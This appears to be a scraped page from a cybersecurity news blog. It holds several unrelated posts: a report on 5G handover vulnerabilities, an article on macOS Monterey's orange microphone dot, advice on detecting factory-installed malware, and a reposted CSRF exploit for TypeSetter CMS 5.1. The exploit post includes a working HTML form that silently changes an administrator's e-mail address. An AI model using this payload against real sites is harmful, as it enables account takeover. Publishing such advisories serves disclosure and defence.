In tricking the UEs to connect to the imposter station and forcing the devices to report bogus measurements to the network, the goal is to trigger a handover event and exploit security flaws in the process to result in DoS, MitM attacks, and information disclosure affecting the user as well as the operator. This not only compromises users’ privacy but also puts service availability at risk.

“When the UE is in the coverage area of the attacker, the rogue base station has high enough signal power to ‘attract’ the UE and trigger a [measurement report], then the attacker has very good chances of forcing the victim UE to attach to his/her rogue base station [by] abusing the handover procedure,” the researchers explained.

“Once, the UE is attached to the attacker it could either enter in a camped mode due to a denial-of-service (DoS) attack and become unresponsive, or the attacker could establish a man-in-the-middle (MitM) relay building the basis for other advanced exploits.”

As many as six security vulnerabilities (identified from A to F in the image above) have been identified in the handover process —

  • Insecure broadcast messages (MIB, SIB)
  • Unverified measurement reports
  • Missing cross-validation in the preparation phase
  • Random-access channel (RACH) initiation without verification
  • Missing recovery mechanism, and
  • Difficulty of distinguishing network failures from attacks

In an experimental setup, the researchers found all the test devices, including OnePlus 6, Apple iPhone 5, Samsung S10 5G, and Huawei Pro P40 5G, to be susceptible to DoS and MitM attacks. The findings were presented at the Annual Computer Security Applications Conference (ACSAC) held earlier this month.

Bookmark
Please login to bookmarkClose

Apple added an orange dot that’s a showstopper for live visuals

By
Steven Black (n0tst3)
-
0
apple
apple


In the interest of security and privacy, Apple on macOS Monterey has added a prominent orange dot to display outputs when audio capture is active. That renders their machines unusable for live visual performance, though, since it’s also shown on external displays. Dear macOS team – we urgently need a fix here.
The basic idea here is sound – to avoid software hijacking your camera and audio input and spying on you, essentially, there’s an orange dot to let you know recording is active. But this essentially makes the Mac unusable for live visuals, since it impacts external projectors and LED walls and the like. (Those applications don’t even need to be obviously using audio; live visuals often use mic or line input to produce sound-reactive animation and the like.)
Mark Coniglio, lead developer of Isadora and a Mac AV veteran for decades, writes a clear explanation that I, uh, hope is getting passed to someone on the OS team soon. (Picture from his post.)
In their infinite wisdom, Apple has added a security feature that negatively affects every audio/video app that uses one of the displays to output to a video projector, including our beloved Isadora. In MacOS Monterey, if any macOS app starts capturing audio an “orange dot” appears to warn you on the primarily display and on all secondary displays. In our particular case, this means that this orange dot appears on the stage output, which is totally unacceptable for anyone using macOS as a professional video tool that sends video output to a video projector.
A more detailed description, plus a call to action to all artists to provide feedback through Apple’s form, is available on the TroikaTronix site:
[TroikaTronix Community]
You can disable the menu bar on external displays, via the “Displays Have Separate Spaces” display preference, but the orange dot still appears.

I just tested this using Ableton Live 11.1 Beta, for instance, and the orange dot is there. I had missed it as I suspect many people had, as you wouldn’t notice there was an issue until you tried to use full-screen output on a display – which you will do when you have a show, but not necessarily when you’re developing content.
More information:
QLab user discussion (that’s the popular Mac live show software)
I’ve also contacted Apple directly to ask if there’s a workaround we’re missing and to ensure this feedback reaches engineering. Meanwhile, this kind of feedback is logged, so provide a rational explanation and your use case as suggested above if this impacts you – which if you read this site is pretty likely.
Unfortunately, these kinds of clashes are not uncommon as the intensive and specific needs of artists and pro audiovisual needs meet up with our mortal enemies, security and battery life. But past experience suggests they are solvable problems. And while these users represent a fringe, they also are some of the bigger spenders on Apple hardware and show off the Mac’s most powerful creative potential, as I noted in my recent MacBook Pro review.
And it does seem there could be a fix here; you already have to give applications permission to access your mic and camera, and it seems there should be some way for an app to disable the orange dot once its permissions are elevated with opt-in by the user.
Here’s hoping they find that solution. Until then, yeah, this is a strike against the Mac just as it was finally becoming competitive again with PCs for live visuals. Watch this space.
Photo courtesy Apple.

CDM is a home for people who make and play music and motion.

Get news and special deals from us in your inbox weekly:

Opt in to receive news and updates.

You have successfully joined our subscriber list.
function ml_webform_success_1444250() {
var $ = ml_jQuery || jQuery;
$(‘.ml-subscribe-form-1444250 .row-success’).show();
$(‘.ml-subscribe-form-1444250 .row-form’).hide();
}

Made by Create Digital Media, GmbH in Berlin

source

Bookmark
Please login to bookmarkClose

Is Your Brand New Computer Pre-Infected With Malware?

By
RiSec.Mitch
-
0
Cyber

Over the years there have been reports of more and more new computers being pre-infected with malware before they even reach the end-user. This issue highlights the current lack of adequate supply chain security in portions of the computer industry. While the malware infections detailed in most reports seem to originate from component manufacturers overseas, there is no reason to think that this type of thing can’t happen domestically as well. We have seen evidence of Devices shipped from China loaded with malware.

Why would someone want to pre-infect a computer?

It’s really all about the money. Unscrupulous criminals participate in malware affiliate marketing programs where they are paid to infect as many computers as possible.

Some of these illegal affiliate programs pay participants as much as $250 for every 1000 computers that they can infect. Infecting a computer or component at the factory-level allows these criminals to achieve a huge number of infected computers in a short amount of time with limited effort since they don’t have to bypass traditional security safeguards.

New York Times: Microsoft Finds PCs That Ship Pre-Infected

In 2012, The New York Times reported that Microsoft had found some computers are shipping with viruses installed that could affect the security and privacy of the data you save on those machines:

On Thursday, Microsoft said it had discovered several new computers, fresh from Chinese factory floors, that carried a particularly pernicious computer virus one capable of invading bank accounts, starting computer attacks and creating back doors that allow criminals to have their way with infected machines.

Microsoft digital crime researchers purchased 20 new computers from different cities in China and discovered that four of them had been infected with viruses. […]

That virus, called Nitol, reported back to a command and control center hosted by the Web domain 3322.org, which is registered to Bei Te Kang Mu Software Technology. That domain, Microsoft researchers say, hosts 500 different strains of malware. Some are capable of switching on a victimmicrophone or Web camera. Others record victims keystrokes, giving cybercriminals access to their log-in credentials and online bank accounts.

Microsoft got permission from a United States court to take down the network of Nitol-infected computers. The takedown was part of a civil suit brought by Microsoft in its increasingly aggressive campaign called Project MARS, for Microsoft Active Response for Security to take the lead in combating digital crime, rather than waiting for law enforcement to act.

New York Times: Microsoft Finds PCs That Ship Pre-Infected

When You First Boot up Your New Computer, Don’t Connect It to a Network

Most modern malware will want to connect to a network so that it can communicate with its origin command and control software, especially if it’s part of a botnet collective. It may also connect to the network to download additional malware or malware updates or to send passwords or other personal information it has gathered from you. You should isolate your new computer until you can properly scan it to make sure it’s not pre-infected.

Use Another Computer to Download a Second Opinion Scanner and Install It

From another computer, download a scanner such as Malwarebytes or another malware-specific scanner and save it to a CD/DVD or a USB hard drive so you can install it on the new computer without using a network connection. The antivirus software on the new computer may have already been compromised or altered so that it is blind to the malware infection. It may report that there is no infection even though malware is present on the computer, this is why you need a second opinion scanner to make sure that there is no preloaded malware on your computer.

If possible, try and find a malware scanner that can scan your system prior to the startup of the operating system as some malware can hide on areas of the disk that can’t be accessed by the operating system. Additionally, all partitions of a device must be fully scanned or analysed manually using a suitable OS or similar.

If you find an out-of-the-box malware infection, you should return the system to the seller and have them alert the manufacturer of the computer that was infected so that they can investigate the issue.

If you still suspect that your new computer might be pre-infected with malware, consider removing the hard drive, placing it in an external USB drive enclosure, and connecting it to another computer that has current anti-virus and anti-malware software. As soon as you connect the drive from the new computer to the USB port of a host computer, scan the USB drive for viruses and other malware. Do not open any files on the USB hard drive while it is connected to the host computer, doing so could infect the host computer.

Once you have scanned the drive for viruses using a traditional virus scanner and used an anti-malware scanner, consider using a second-opinion malware scanner as well to ensure that no stone is left unturned. Even with all these scans, it’s possible that the computer’s firmware may be infected, but this is probably much less likely than having a more traditional malware infection that can be detected by malware scanners.

If all scans are ‘green’, move your hard drive back to the new computer and ensure that you maintain your anti-virus and anti-malware updates and run regularly scheduled scans of your system.

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

TypeSetter 5.1 – CSRF (Change admin e-mail) Exploit

By
RiSec.Mitch
-
0

Date: 2020-12-01

CVE: N/A

Platform: PHP

# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp

######## Description ########

Attacker can change admin e-mail address 

## Vulnerable

- Go to the admin page view preferences
- Change the e-mail address

######## Proof of Concept ########

===> REQUEST <==== 
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences

## < SNIPP > 


verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save

#### Attack Code ####

<html>

  <body>

    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">

      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />

      <input type="hidden" name="email" value="[CHANGE HERE]" />

      <input type="hidden" name="oldpassword" value="" />

      <input type="hidden" name="password" value="" />

      <input type="hidden" name="password1" value="" />

      <input type="hidden" name="algo" value="password&#95;hash" />

      <input type="hidden" name="cmd" value="changeprefs" />

      <input type="hidden" name="aaa" value="Save" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>
Bookmark
Please login to bookmarkClose
1...676869...79Page 68 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.